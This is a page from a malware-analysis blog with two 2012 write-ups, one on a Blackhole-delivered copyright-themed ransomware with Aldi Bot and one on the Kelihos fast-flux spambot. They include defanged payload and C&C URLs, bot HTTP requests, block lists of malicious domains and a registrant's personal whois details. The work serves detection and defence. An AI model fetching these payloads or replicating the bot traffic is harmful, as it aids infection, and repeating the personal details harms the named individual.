Archive for the 'Malware & Virus Analysing' Category

Page 4 of 48

Ransomware Gets Professional, Targeting Switzerland, Germany And Austria

Published on May 6, 2012 in Malware & Virus Analysing. 1 Comment Tags: , .

In March I blogged about a ransomware which has been targeting various countries, locking down the victims computer due to “Child Porn and Terrorism”.

This week I spotted another ransomware campaign that is targeting Swiss, German, and Austrian internet users. This time the criminals seems to use a different schema to lock down the victims computer: violation of local copyright law.

*** Infection vector ****
The infection vector is a well known drive-by exploit kit called “Blackhole”. It is sold in underground forum and used by various criminal groups to infected computers “on the fly” by (ab)using one or more security vulnerabilities in the victims web browser (or a third party plug-in like Adobe Flash Player, Adobe Reader or Java). In this case a Blackhole exploit kit located at pampa04.com was involved to spread the ransomware:

hXXp://pampa04.com/main.php?page=d73d9795c56f8f33 [landing page]
-> hXXp://pampa04.com/data/ap2.php [JavaScript loading exploits]
–> hXXp://pampa04.com/Edu.jar [Java exploit]
—> hXXp://pampa04.com/w.php?f=5e91c&e=0 [Payload]

If the installed Java version on the victims computer is not up to date (unpatched), the downloaded jar file (Edu.jar) will exploit a well known vulnerability in Java which will trigger the download of the payload (Trojan) and finally execute it to infect the computer. The payload had a detection rate of 4/42 on Virustotal:

Filename: info.exe
MD5: 56f4d5837af32b12069576fae8c2b3c5
File size: 312.5 KB
AV-detection rate: 4/42

*** Analysis of the payload (Ransomware) ***
If the exploitation of the victims computer is successful, the Ransomware will install itself into the Application Data directory of the current user:

C:\Documents and Settings\Christoph\Application Data\itunes_service01.exe

Once the computer has been infected, the Ransomware will try to contact its Command&Control server (C&C) located at joonwalker.com using HTTP GET:

hXXp://joonwalker.com/unser1/redirector/redirector.php
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php
hXXp://joonwalker.com/ajax/libs/jquery/1.3.2/jquery.min.js
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/bg_ch.gif
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/js/keyboard.js

The landing URL redirector.php will determine the location of the infected computer by using GeoIP and will redirect the request to the matching site by using HTTP 302 Found, for example:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php

While investigating this C&C I’ve found several other URLs which shows that this Ransomware is targeting not only Switzerland but also several other countries:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/ (Switzerland)
hXXp://joonwalker.com/unser1/universalbezahlung/deutschland/ (Germany)
hXXp://joonwalker.com/unser1/universalbezahlung/oesterreich/ (Austria)
hXXp://joonwalker.com/unser1/universalbezahlung/england/ (England)
hXXp://joonwalker.com/unser1/universalbezahlung/frankreich/ (France)
hXXp://joonwalker.com/unser1/universalbezahlung/holland/ (Netherlands)
Country: Swiztzerland (SUISA)
Country: Germany (GVU)
   
Country: Austria (AKM)
Country: United Kingdom (PRS)
   
Country: France (SACEM)
Country: Netherlands (BUMA-STEMRA)
   

What lights up quickly when taking a look at these URLs is the fact that they are all written in German. So it looks like the cybercriminal behind this ransomware campaign is a German speaking person. While analysing all these different URLs I noticed that the cybercriminal has spent quite some time to prepare them. The language seems to be well written (I couldn’t find as many write errors as I would have expected). In addition it appears that the cybercriminal tried to get intel about where the victim can buy paysafecard (for the record: the victim has to pay a country specific amount of money to the cybercriminal using paysafecard to get his computer unlocked) and which association is tracking copyright infringement in the specific country. For example, he tells Swiss victims that they can obtain paysafecard on the federal railway station (SBB) and the MediaMark (a German based electronic discounter).

Another interesting finding is the fact that the Ransomware comes with an additional Trojan called Aldi Bot. Aldi Bot steals banking information (similar to ZeuS and SpyEye) and has some additional DDoS functionality.

Fortunately, Aldi Bot C&C traffic is very easy to identify due to the fact that this Trojan uses a specific User-Agent called “Aldi Bot FTW! :D ”. In this case the Aldi Bot C&C is located at the same server/domain as the Ransomware itself but on a different URI:

GET /unser1/universalpanel/gate.php?hwid=XXX&pc=XXX&localip=XXX&winver=XXX HTTP/1.1
User-Agent: Aldi Bot FTW! :D
Host: joonwalker.com

*** Command&Control Infrastructure ***

The domain name used by this Ransomware and Aldi Bot is pointing to a Russian web hosting provider called “Amtel Svyaz”:

$ dig +short joonwalker.com
195.208.185.99

$ whois 195.208.185.99
inetnum: 195.208.184.0 – 195.208.187.255
netname: AMTEL-SVYAZ
descr: “Amtel Svyaz” ZAO
country: RU
org: ORG-AZ2-RIPE
admin-c: AG12682-RIPE
tech-c: AG12682-RIPE
tech-c: AG8732-RIPE
status: ASSIGNED PA
mnt-by: ROSNIIROS-MNT
mnt-domains: AMTELSV-MNT
mnt-routes: ROSNIIROS-MNT
source: RIPE # Filtered
[...]

The domain name joonwalker.com is registered through a Russian based domain registrar called Regtime Ltd (also known as webnames.ru):

Domain name: joonwalker.com

Name servers:
ns1.nameself.com
ns2.nameself.com

Registrar: Regtime Ltd.
Creation date: 2012-04-29
Expiration date: 2013-04-29

Registrant:
Huth Matthias
Email: huthmatthias@yahoo.de
Organization: Huth Matthias
Address: Bremenstrasse 12
City: Gladbeck
State: NRW
ZIP: 45964
Country: DE
Phone: +49.3051236167
Fax: +49.3051236169

According to whois the holder of this domain is “Huth Matthias” which has registered various other domain names this year:

arschenpustel.com
arschtrompete.com
arschtrompeteauto.com
arschtrompeteshop.com
bascvj.com
brauchnwanich.com
dergeldmacher.com
deutschecamworld.com
easyonlinebuxxx.com
fettehupenalter.com
fiftypercentworker.com
flobbo-online.com
fressehaltenlol.com
fuehlediebezahlung.com
fuehlediecon.com
geiledeutschecams.com
geileschnittendicketitten.com
geld-machen-mit-ebooks.com
geldverdienen-easy.com
gema-gebuehreneinzug.in
gemagatezor.com
gemagatezor.net
gewinnspiele-king.com
grosqa.com
helexxaione.com
hunnibezahlor.com
hunniconnector.com
ichmussconnecten.com
joonwalker.com
knallrattern.com
kohlhanser.com
konschtantin.com
kuemmeljoe.com
leckerfrischekacke.com
meineguetekak.com
meineherrenlaff.com
mightyporntube.com
mjun1.info
mongoneger.com
moxitoeex.com
moxitom.com
muellgeburten.com
muselfrauen.com
nulpapors.com
odrjaj.com
ratschuikakk.com
ratzeputzel.com
reich-durch-ebooks.com
toilettenspuelung.com
trueffelmueffel.com
tschaijikki.com
tujkea.com
universalpan1.com
universalpan2.com
urgeprotectar.com
vabrus.com
verdienjegek.com
whatwillhappenbaby.com
wonkeebonkii.com
xakacj.com
zeig-malmo-pse.in
zeig-malmopse.in
zeigmalmoepse.in
zeigmalmopse.in

All these domain names can be considered as malicious and should be blocked on your network edge.
To prevent this kind of infections you should ensure that your operating system as well as all installed applications (especially browser plug-ins) are up to date.

*** Further reading ***

Kelihos Back In Town Using Fast Flux

Published on March 4, 2012 in Malware & Virus Analysing. 0 Comments Tags: , , .

In September 2011, Microsoft announced the takedown of the Kelihos botnet. In the beginning of 2012, Kaspersky found a new version of Kelihos in the wild.

Kelihos (also know as Hlux) is a Spambot with the capability to steal credentials from the victims computer and drop additional malware. While the old version used the second level domain cz.cc for it’s distribution and to control the botnet, the new version takes advantage of TLD .eu in combination with Fast Flux techniques.

*** The Kelihos Spambot ***

Recently, I spotted a sample of Kelihos in my sandnet, so I decided to have a short look at it:

As soon the victims computer has been infected successfully, the malware will try to drop an additional file by calling a .eu domain which seem to be hard coded in the infection binary:

hXXp://ejywqem.eu/rtce003.exe
hXXp://etrodhy.eu/jucheck.exe

The first URL will return a binary:

Filename: rtce003.exe
MD5 hash: 1393e4f5d0691e3de07eeda1b1451b89
File size: 886’272 bytes
AV detection: 10 / 43

The mentioned file will install the WinPcap library, which is being used by the malware to sniff the network traffic on the victims computer:

Origin process (executing process) Affected file
C:\WINDOWS\Temp\_ex-68.exe C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\Temp\_ex-68.exe C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\Temp\_ex-68.exe C:\WINDOWS\system32\drivers\npf.sys

By sniffing the network traffic, the malware is able to steal sensitive data like credentials.
The second URL (jucheck.exe) will just return a HTTP 200 OK. As soon as the WinPcap library has been installed, the malware will start to communicate with other drones on port 80 (using it’s own protocol). It’s some kind of P2P protocol used by the malware to get a list of other drones participating in the Kelihos botnet.

To begin it’s spam operations, Kelihos will connect to another drone using HTTP and a random URL string:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre

*encrypted-data*

HTTP/1.1 200
Server: Apache
Content-Length: 55002
Content-Type:
Last-Modified: X
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 04 Mar 2012 X
Last-Modified:Sun, 04 Mar 2012 X
Accept-Ranges:bytes

*encrypted-data*

This communication is being used to get the spam templates as well as the email address list. Afterwards the spambot will start to send out spam mails (click to enlarge):

Currently the Kelihos botnet seems to send out German stock spam.

*** Kelihos FastFlux botnet ***

Let’s take a closer look at the .eu domains used by Kelihos. What pops up quickly is the fact that the domain names used by Kelihos are hosted on a FastFlux botnet, as all the records has a TTL of 0:

$ dig ejywqem.eu A

;; QUESTION SECTION:
;ejywqem.eu. IN A

;; ANSWER SECTION:
ejywqem.eu. 0 IN A 88.132.1.15

The delegated nameservers for the mentioned domain name are hosted on a FastFlux botnet as well. This is what we call Double-Flux:

$ dig ejywqem.eu NS

;; QUESTION SECTION:
;ejywqem.eu. IN NS

;; ANSWER SECTION:
ejywqem.eu. 0 IN NS ns6.ejywqem.eu.
ejywqem.eu. 0 IN NS ns1.ejywqem.eu.
ejywqem.eu. 0 IN NS ns2.ejywqem.eu.
ejywqem.eu. 0 IN NS ns3.ejywqem.eu.
ejywqem.eu. 0 IN NS ns4.ejywqem.eu.
ejywqem.eu. 0 IN NS ns5.ejywqem.eu.

When taking a look at the geo location of this Fast Flux botnet, it seems that the botnet is mainly located in eastern Europe:

Due to the fact that these domain names are using double-flux, it is extremely hard to shut them down (there is no webserver or DNS server to take down). Currently, there are several domain names hosted on this Fast Flux botnet:

awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu

All mentioned domain names are registered through OnlineNIC (a domain name registrar located in the US):

Domain: zoneczu

Registrant:
NOT DISCLOSED!
Visit www.eurid.eu for webbased whois.

Registrar Technical Contacts:
Name: Breeze Wu
Organisation: OnlineNIC Inc.
Language: en
Phone: +86.15306099988
Fax: +852.58044444
Email: Tech@regionalofficecenter.com

Registrar:
Name: OnlineNIC Inc
Website: www.onlinenic.com

Name servers:
ns5.pizzebu.com
ns6.pizzebu.com

The domain name used to resolve these malicious domains is registered through internet.bs (a domain name registrar located in the Bahamas):

Domain Name: PIZZEBU.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.PIZZEBU.COM
Name Server: NS2.PIZZEBU.COM
Name Server: NS3.PIZZEBU.COM
Name Server: NS4.PIZZEBU.COM
Name Server: NS5.PIZZEBU.COM
Name Server: NS6.PIZZEBU.COM
Status: clientTransferProhibited
Updated Date: 13-jan-2012
Creation Date: 13-jan-2012
Expiration Date: 13-jan-2013

This Fast Flux botnet reminds me of the Fast Flux botnet used by Waledac which was also using a TTL of 0 for their DNS records.

*** Detection ***

As hard as it is to take down this botnet, as easy it should be to detect computers infected with Kelihos. The malware itself seems to ignore several RFCs which makes it very easy to detect infected computers in corporate and governmental networks.

In the first stage, the malware hits “jucheck.exe” with an incomplete HTTP request:

GET /jucheck.exe HTTP/1.0
Host: etrodhy.eu

This particular HTTP request is missing several HTTP fields which a normal web browser would use:

  • Several HTTP fields like User-Agent, Accept-Language, Accept-Encoding are missing
  • The URL jucheck.exe seems to be quite static, so you just have to watch out for .eu domains in combination of jucheck.exe in your gateway logs

In the second stage (where the malware tries to connect to other drones using HTTP), the malware sends 1-2KB of encrypted data to the foreign peer:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464

I’m not a RFC specialist, but I’ve never seen a HTTP GET request in combination with the Content-Length header. I would only expect the HTTP Content-Length header from the server (response) or when sending a HTTP POST request to the server. Therefore it should be very easy to detect Kelihos in your network, just watch out for HTTP GET request containing the header field “Content-Length”.

Happy Kelihos hunting!

*** Further reading ***

*** Further reading (for the Kelihos botnet masters) ***

Follow me on Twitter:
https://twitter.com/abuse_ch
economics-recluse
Scene
Urgent!